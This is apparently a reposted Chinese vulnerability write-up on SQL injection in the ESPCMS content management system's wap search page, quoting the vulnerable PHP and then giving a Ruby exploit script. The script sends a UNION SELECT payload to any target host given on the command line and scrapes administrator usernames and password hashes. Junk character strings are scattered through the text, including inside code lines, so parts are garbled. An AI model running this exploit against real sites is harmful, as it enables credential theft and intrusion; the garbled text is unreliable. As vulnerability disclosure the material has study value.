espcms wap模块搜索处SQL注入

admin

0×0 漏洞概述0×1 漏洞细节
0×2 PoC
3 M% l' o! y) R3 x3 N- Z; p
5 h% `7 `1 k; M+ ]
# }- c  s* ~  L5 J( o. D& w- |4 G
& H& e! k( B7 Y, i, b0×0 漏洞概述
/ s* _  E6 a8 K& x2 B  E
1 W' ]* i6 f1 w: b. W% F1 J易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统，它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便，可以帮您迅速、轻松地构建起一个强大专业的企业网站。
4 n; m& ^* q. N) C* M% H其在处理传入的参数时考虑不严谨导致SQL注入发生

  m, P( W/ M6 C; x, c# r8 s, ]
& X/ F% T* L: w( |9 `% \6 N  u0×1 漏洞细节
9 c6 }( l3 u9 F2 j/ H& G" T% `% U
变量的传递过程是$_SERVER['QUERY_STRING']->$urlcode->$output->$value->$db_where->$sql->mysql_query，整个过程无过滤导致了注入的发生。
正因为变量是从$_SERVER['QUERY_STRING']中去取的，所以正好避开了程序的过滤。
而注入的变量是数组的值，并非数组的key，所以也没过被过滤，综合起来形成了一个比较少见的SQL注入。

: U0 D9 a4 R1 x0 E2 d在/interface/3gwap_search.php文件的in_result函数中:

$ F. N$ O  T  P6 S5 g% U  k+ Y2 ~

1 W% @7 M% @  G% w( g5 W       function in_result() {
            ... ... ... ... ... ... ... ... ...
            $urlcode = $_SERVER[ 'QUERY_STRING '];
            parse_str(html_entity_decode($urlcode), $output);

& l6 l2 |# W# c$ o8 \: R            ... ... ... ... ... ... ... ... ...
            if (is_array($output['attr' ]) && count($output['attr']) > 0) {

                  $db_table = db_prefix . 'model_att';
1 u* e' `' d8 f' g
1 a& z) i& b  F; o& q1 x                   foreach ($output['attr' ] as $key => $value) {
                         if ($value) {

                              $key = addslashes($key);
                              $key = $this-> fun->inputcodetrim($key);
; o% S# U  P) c- `                              $db_att_where = " WHERE isclass=1 AND attrname='$key'";
                              $countnum = $this->db_numrows($db_table, $db_att_where);
                               if ($countnum > 0) {
9 e3 `9 j* N9 K+ P0 |2 H                                    $db_where .= ' AND b.' . $key . '=\'' . $value . '\'' ;
7 n+ `+ M/ P$ @/ B; m& u& S                              }
                        }
6 V2 T2 b1 C: Y                  }
            }
% Q5 R: z( q9 f6 c1 `            if (!empty ($keyword) && empty($keyname)) {
5 ]6 P) _) g& A: D8 }4 W9 H$ o                  $keyname = 'title';
6 V" O8 V- }5 d7 \+ B5 P                  $db_where.= " AND a.title like '%$keyword%'" ;
0 s2 G5 {# j  C( E            } elseif (!empty ($keyword) && !empty($keyname)) {
& a" v$ u  u; Q/ y1 U1 W4 B                  $db_where.= " AND $keyname like '% $keyword%'";
' ?/ K) ^) `3 o3 ]/ \/ b            }
" p8 i% I1 I* m9 @+ b5 {1 c            $pagemax = 15;
. f% X" E# q7 l+ c
            $pagesylte = 1;

! w/ E4 @" c9 v: h& J, V             if ($countnum > 0) {

$ b  F  G- t  o, {$ |  S1 K9 {                  $numpage = ceil($countnum / $pagemax);
            } else {
# y& }  [, U! d1 H8 n8 I# L, }                  $numpage = 1;
# X1 V$ c- Y8 H/ [            }
            $sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;
            $this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0);
$sql = $this-> htmlpage->PageSQL('a.did' , 'down' );            $rs = $this->db->query($sql);
# g9 J2 J9 P4 X2 P1 `( Q( P8 m; Q3 \- U            ... ... ... ... ... ... ... ... ...
      }
* `: R4 [0 K& f* N. H% E; k

0×2 PoC

$ k* Y6 f* h" L, x

, w: D( D  A7 {& y: K' Zrequire "net/http"

: i) [% w" ]& V# Tdef request(method, url)
    if method.eql?("get")
        uri = URI.parse(url)
6 e3 K9 w  ]6 _# o! }+ A0 k        http = Net::HTTP.new(uri.host, uri.port)
        response = http.request(Net::HTTP::Get.new(uri.request_uri))
% a% _, n; s3 j: K5 }6 t        return response
# X% z0 G) y- C6 x9 a) g" d    end
end
5 F8 G. O# \# _
doc =<<HERE
. P8 x" ~! |8 ]-------------------------------------------------------
+ }3 [0 q; Y$ y: p; P7 j9 ~Espcms Injection Exploit
: W, n& E: C8 Q% g9 ?3 `+ eAuthor:ztz
Blog:http://ztz.fuzzexp.org/
-------------------------------------------------------

HERE
1 f+ T5 }7 ~+ E& J/ d' M, _0 o
" x' r. |9 B4 M# ?* P9 Y0 Pusage =<<HERE
Usage:         ruby #{$0} host port path
example:     ruby #{$0} www.target.com 80 /
HERE
7 H: r6 z% r' G* ~
; h% G* P% f# Vputs doc
% A1 y+ r  B4 b4 {+ f# h- _. kif ARGV.length < 3
    puts usage
) m! [# l3 t4 g& k3 `. T9 @% _. F3 oelse
    $host = ARGV[0]
    $port = ARGV[1]
6 e% D  N1 l7 {, [3 m5 V    $path = ARGV[2]

    puts "

send request..."
    url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&
attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13
,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27
+ L& L5 K" a6 U# d! x1 h. J,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"
    response = request("get", url)
    result = response.body.scan(/\w+&\w{32}/)
    puts result
4 c% H! H& g$ aend
6 a" E( [9 ]5 h5 i; j) \
+ I0 A0 S1 h5 K7 h" I